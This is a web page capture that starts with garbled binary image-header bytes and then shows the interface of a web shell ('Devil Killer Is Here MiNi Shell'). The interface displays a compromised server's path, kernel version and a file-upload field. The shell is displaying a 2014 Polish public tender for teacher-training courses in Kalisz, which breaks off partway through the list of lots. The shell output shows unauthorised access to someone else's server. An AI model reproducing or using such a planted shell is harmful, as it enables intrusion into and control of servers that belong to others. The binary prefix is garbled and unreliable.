JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140407/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140407/116642-N-2014.html

<p class="kh_header"><b>Kalisz: Przeprowadzenie form doskonalenia dla nauczycieli w ramach sieci współpracy 
i samokształcenia projektu Kompetencje zawodowe nauczycielek i nauczycieli jako element budowania organizacji uczącej się i lokalnej strategii oświatowej w  powiecie ostrzeszowskim  w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 116642 - 2014; data zamieszczenia: 07.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Doskonalenia Nauczycieli w Kaliszu , ul. Wrocławska 182, 62-800 Kalisz, woj. wielkopolskie, tel. 062 7676301, faks 062 7665965.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.odn.kalisz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Samorządowa Województwa Wielkopolskiego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie form doskonalenia dla nauczycieli w ramach sieci współpracy 
i samokształcenia projektu Kompetencje zawodowe nauczycielek i nauczycieli jako element budowania organizacji uczącej się i lokalnej strategii oświatowej w  powiecie ostrzeszowskim  w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa zorganizowania i przeprowadzenia form doskonalenia dla wskazanych grup uczestników, w ramach realizacji zamówienia pn.: Przeprowadzenie form doskonalenia nauczycieli w ramach sieci współpracy i samokształcenia w ramach projektu Kompetencje zawodowe nauczycielek i nauczycieli jako element budowania organizacji uczącej się i lokalnej strategii oświatowej w  powiecie ostrzeszowskim  realizowanego przez Powiat Ostrzeszowski w partnerstwie z Ośrodkiem Doskonalenia Nauczycieli w Kaliszu oraz Publiczną Biblioteką Pedagogiczną Książnica Pedagogiczna im. A. Parczewskiego w Kaliszu. Projekt realizowany w ramach POKL, Działanie 3.5 Kompleksowe wspomaganie rozwoju szkół. 
2. Realizacja form doskonalenia nauczycieli nastąpi  w terminie od 28.04.2014 r. do 30.06.2015 r.  i obejmie  ogółem 126 godzin w tym:
  a) szkolenia w ramach sieci  -  126 godzin 
     2 sieci nauczycieli  x 2 grupy x 2 szkolenia po 5 godzin , 2 sieci x   2 grupy x 2 szkolenia po 4 godz, , 3 sieci nauczycieli x 1 grupa x 2 szkolenia  po 5 godz., 3 sieci nauczycieli x 1 grupa x 2 szkolenia po 4 godz 
3.Przedmiot zamówienia obejmie realizację form doskonalenia dla nauczycieli łącznie 126 godzin dydaktycznych ( 45 min - 1 godz. dydaktyczna) w ramach 20 części zamówienia.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 20.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca złoży oświadczenie o spełnieniu tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca złoży oświadczenie o spełnieniu tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponują osobami zdolnymi do wykonania zamówienia, które będą uczestniczyć
w wykonywaniu zamówienia :
a) cześć I  -  Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca dysponuje ekspertem - osobą zdolną do wykonania zamówienia,  która spełnia poniższe warunki, tj posiada:
-wykształcenie magisterskie II st. i jest trenerem mającym wiedzę i doświadczenie w zakresie budowania strategii planowania promocji szkoły, nowoczesnych metod marketingu szkoły - zarówno w odniesieniu do klientów wewnętrznych, jak klientów zewnętrznych szkoły.
- posiada doświadczenie w prowadzeniu zajęć o podobnej tematyce dla kadry zarządzającej. 
b) cześć II  Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca dysponuje ekspertem - osobą zdolną do wykonania zamówienia, która spełnia poniższe warunki, tj posiada:
-wykształcenie magisterskie II  i jest trenerem mającym doświadczenie w zakresie strategii współpracy szkoły z dziennikarzami i mediami, zarządzania informacją dotyczącą sytuacji trudnych i kryzysowych oraz kształtowania pozytywnego wizerunku szkoły.
- posiada doświadczenie w prowadzeniu zajęć o podobnej tematyce dla kadry zarządzającej
c) cześć III Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca dysponuje ekspertem - osobą zdolną do wykonania zamówienia,  która spełnia poniższe warunki, tj posiada:
-wykształcenie magisterskie II  i jest trenerem w zakresie zasad precedencji w rzeczywistości szkolnej, wystąpień publicznych (techniki wystąpień w zależności od rodzaju wystąpień w rzeczywistości szkolnej)
- posiada doświadczenie w prowadzeniu zajęć o podobnej tematyce dla kadry zarządzającej 
d) cześć IV Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca dysponuje ekspertem - osobą zdolną do wykonania zamówienia,  która spełnia poniższe warunki, tj posiada:
-wykształcenie magisterskie II  i jest trenerem oraz posiada wiedzę i doświadczenie w zakresie technik negocjacyjnych w odniesieniu do klientów wewnętrznych i zewnętrznych szkoły, rozwiązywania konfliktów oraz umiejętnego przekonywania do wprowadzania zmian niezbędnych w szkole w odniesieniu do rzeczywistości szkolnej,
 - posiada doświadczenie w prowadzeniu zajęć o podobnej tematyce dla kadry zarządzającej lub nauczycieli szkół zawodowych
e) cześć V - Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca dysponuje ekspertem - osobą zdolną do wykonania zamówienia,  która spełnia poniższe warunki, tj posiada:
-  wykształcenie magisterskie II 
- posiada doświadczenie w prowadzeniu zajęć  o podobnej tematyce (szkolenia dla nauczycieli, uczniów, studentów)
f) cześć VI - Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca dysponuje ekspertem - osobą zdolną do wykonania zamówienia,  która spełnia poniższe warunki, tj posiada:
-wykształcenie magisterskie II  
- posiada doświadczenie w prowadzeniu zajęć  o podobnej tematyce (szkolenia dla nauczycieli, uczniów, studentów)
g) cześć VII - Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca dysponuje ekspertem - osobą zdolną do wykonania zamówienia, z która spełnia poniższe warunki, tj posiada:
-wykształcenie magisterskie II  
 - posiada doświadczenie w prowadzeniu zajęć  o podobnej tematyce (szkolenia dla nauczycieli, uczniów, studentów)
h) cześć VIII - Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca dysponuje ekspertem - osobą zdolną do wykonania zamówienia,  która spełnia poniższe warunki, tj posiada:
-wykształcenie magisterskie, doświadczenie związane z edukacyjnymi projektami unijnymi
 - posiada doświadczenie w prowadzeniu zajęć  o podobnej tematyce (szkolenia dla nauczycieli, dyrektorów, samorządowców)
i) cześć IX - Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca dysponuje ekspertem - osobą zdolną do wykonania zamówienia,  która spełnia poniższe warunki, tj posiada:
- wykształcenie magisterskie II  
 - posiada doświadczenie w prowadzeniu zajęć  o podobnej tematyce (szkolenia dla nauczycieli, uczniów, studentów)
j) cześć X -  Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca dysponuje ekspertem - osobą zdolną do wykonania zamówienia,  która spełnia poniższe warunki, tj posiada:
-wykształcenie magisterskie II 
-co najmniej 5-letni staż pracy w szkole na stanowisku nauczyciela
-doświadczenie w prowadzeniu zajęć o podobnej tematyce (szkolenia dla nauczycieli lub studentów)
-publikacje naukowe z danej dziedziny
k) cześć XI - Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca dysponuje ekspertem - osobą zdolną do wykonania zamówienia, która spełnia poniższe warunki, tj posiada:
-wykształcenie magisterskie II  
-co najmniej 5-letni staż pracy w szkole na stanowisku nauczyciela
-doświadczenie w prowadzeniu zajęć  o podobnej tematyce (szkolenia dla nauczycieli, studentów)
-publikacje naukowe z danej dziedziny
l) cześć XII - Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca dysponuje ekspertem - osobą zdolną do wykonania zamówienia, która spełnia poniższe warunki, tj posiada:
-wykształcenie magisterskie II  
-posiada doświadczenie w prowadzeniu zajęć  o podobnej tematyce (szkolenia dla nauczycieli, uczniów, studentów)
m) cześć XIII -  Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca dysponuje ekspertem - osobą zdolną do wykonania zamówienia,  która spełnia poniższe warunki, tj posiada:
-wykształcenie magisterskie II 
- posiada doświadczenie w prowadzeniu zajęć  o podobnej tematyce ( szkolenia dla nauczycieli, uczniów, studentów)
n) cześć XIV -  Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca dysponuje ekspertem - osobą zdolną do wykonania zamówienia,  która spełnia poniższe warunki, tj posiada:
-wykształcenie magisterskie II  
- posiada doświadczenie w prowadzeniu zajęć  o podobnej tematyce ( szkolenia dla nauczycieli, uczniów, studentów)
o) cześć XV -  Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca dysponuje ekspertem - osobą zdolną do wykonania zamówienia,  która spełnia poniższe warunki, tj posiada:
- wykształcenie magisterskie II  
 - posiada doświadczenie w prowadzeniu zajęć  o podobnej tematyce ( szkolenia dla nauczycieli, uczniów, studentów)
p) cześć XVI -  Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca dysponuje ekspertem - osobą zdolną do wykonania zamówienia,  która spełnia poniższe warunki, tj posiada:
-wykształcenie magisterskie II  
 - posiada doświadczenie w prowadzeniu zajęć  o podobnej tematyce ( szkolenia dla nauczycieli, uczniów, studentów)
r) cześć XVII -    Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca dysponuje ekspertem - osobą zdolną do wykonania zamówienia,  która spełnia poniższe warunki, tj posiada:
-wykształcenie magisterskie II i jest trenerem lub promotorem zmian KOWEZiU
- posiada doświadczenie w prowadzeniu zajęć o podobnej tematyce dla kadry zarządzającej lub nauczycieli szkół zawodowych
s) cześć XVIII -  Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca dysponuje ekspertem - osobą zdolną do wykonania zamówienia, która spełnia poniższe warunki, tj posiada:
-wykształcenie magisterskie II  i jest trenerem lub promotorem zmian KOWEZiU
- posiada doświadczenie w prowadzeniu zajęć o podobnej tematyce dla kadry zarządzającej lub nauczycieli szkół zawodowych
t) cześć XIX -  Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca dysponuje ekspertem - osobą zdolną do wykonania zamówienia,  która spełnia poniższe warunki, tj posiada:
-wykształcenie magisterskie II  i jest trenerem lub promotorem zmian KOWEZiU
- posiada doświadczenie w prowadzeniu zajęć o podobnej tematyce dla kadry zarządzającej lub nauczycieli szkół zawodowych
u) cześć XX Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca dysponuje ekspertem - osobą zdolną do wykonania zamówienia,  która spełnia poniższe warunki, tj posiada:
-wykształcenie magisterskie II  i jest trenerem lub promotorem zmian KOWEZiU
 - posiada doświadczenie w prowadzeniu zajęć o podobnej tematyce dla kadry zarządzającej lub nauczycieli szkół zawodowych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca złoży oświadczenie o spełnieniu tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.odn.kalisz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Doskonalenia Nauczycieli w Kaliszu ul. Wrocławska 182 pokój nr 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.04.2014 godzina 10:00, miejsce: Ośrodek Doskonalenia Nauczycieli w Kaliszu ul. Wrocławska 182 pokój nr 24.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt realizowany w ramach POKL, Działanie 3.5 Kompleksowe wspomaganie rozwoju szkół.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Szkolenie pn Budowanie   strategii promocyjnej szkoły..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zalety planowania strategicznego 
w kontekście promocji szkoły.
Ocena efektywności elementów promocji szkoły wykorzystywanych dotychczas.
Umiejętność wyboru wyróżników szkoły.
Redefinicja czynników promocyjnych (szkolne uroczystości,   spotkania, działania w środowisku lokalnym, materiały informacyjne   prezentacje etc.).
- 5 godz.  x 2 grupy    ogółem 10 godzin dydaktycznych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Szkolenie pn. Metody i technik przydatne we współpracy z   mediami oraz partnerami społecznymi..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zasady współpracy z dziennikarzami  i przygotowywanie komunikatów medialnych.
Zasady informowania o sytuacjach trudnych i   kryzysowych.
Jak kształtować pozytywny wizerunek szkoły w   mediach.
jak ukazywać zalety współpracy ze szkołą i   korzyści z jej wspierania partnerom społecznym.
Praca z trudnym klientem.
- 4 godz.  x 2 grupy    ogółem 8 godzin dydaktycznych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Szkolenie pn. Wizerunek dyrektora   szkoły..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ekspozycja publiczna dyrektora -jak wyglądać, jak się   zachowywać, aby jak najlepiej reprezentować placówkę?
Wystąpienia publiczne - jak się przygotować, jak przemawiać? (techniki w zależności od rodzaju wystąpienia).
Rozmowa z trudnym klientem - wykład 
Zasady precedencji w rzeczywistości   szkolnej.
- 5 godz.  x 2 grupy    ogółem 10 godzin dydaktycznych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Szkolenie pn Techniki prowadzenia   negocjacji z trudnym partnerem w szkole ( rodzic, uczeń, nauczyciel)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prezentacja technik negocjacyjnych przydatnych w   relacjach z partnerami szkoły.
W jaki sposób przekonywać do swych pomysłów   nauczycieli, rodziców  i uczniów
Czy możliwe są negocjacje i jak je prowadzić z   nauczycielami, rodzicami i uczniami
- 4 godz.  x 2 grupy    ogółem 8 godzin dydaktycznych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Szkolenie pn Szkolenie pn. Komunikacja interpersonalna jako narzędzie rozwiązywania    konfliktów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Znaczenie i funkcje komunikacji
Proces komunikacji
Komunikacja werbalna
Komunikacja pisemna
Komunikacja niewerbalna
Bariery skutecznej komunikacji
Zasady dobrego komunikowania się
Typy zachowań uczestników procesu komunikacji 
Szkolenie powinno dać narzędzie nauczycielom w rozwiązywaniu konfliktów w szkole między nauczycielami, uczniami, uczniem a nauczycielem, a także między nauczycielami i rodzicami. Szkolenie powinno odbywać się metodami aktywnymi w formie warsztatów z dużą ilością ćwiczeń, bez zbędnej skomplikowanej wiedzy związanej z procesem. 5 godz x 2 grupy ogółem 10 godz. dydaktycznych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Szkolenie pn. Kontakty na linii nauczyciel - rodzic.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Współpraca z rodzicami,  
Aktywizacja rodziców, 
Wzmocnienie i uatrakcyjnienie współpracy szkoły z rodzicami, 
Pozyskiwanie rodziców jako partnerów szkoły, 
Formy integracji i komunikacji szkoły z rodzicami, 
Jak radzić sobie z roszczeniową postawą rodziców
Szkolenie powinno odbywać się metodami aktywnymi w formie warsztatów z dużą ilością przykładów rozwiązań.
- 4 godz.  x 2 grupy    ogółem 8 godzin dydaktycznych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Szkolenie pn. Metody aktywizujące jako narzędzie w pracy z uczniem i  motywacji do nauki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Co przemawia za stosowaniem metod aktywizujących?
- dla nauczyciela
- dla ucznia słabego, zdolnego
Przykłady aktywizujących metod nauczania 
Motywowanie uczniów do nauki, 
Nowatorskie metody nauczania.
Szkolenie powinno odbywać się metodami aktywnymi w formie warsztatów z dużą ilością przykładów metod i ćwiczeń w niewielkich grupach..
- 5 godz.  x 2 grupy    ogółem 10 godzin dydaktycznych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Szkolenie pn. Opracowanie praktycznych rozwiązań na potrzeby szkoły - projekty edukacyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Projekty edukacyjne
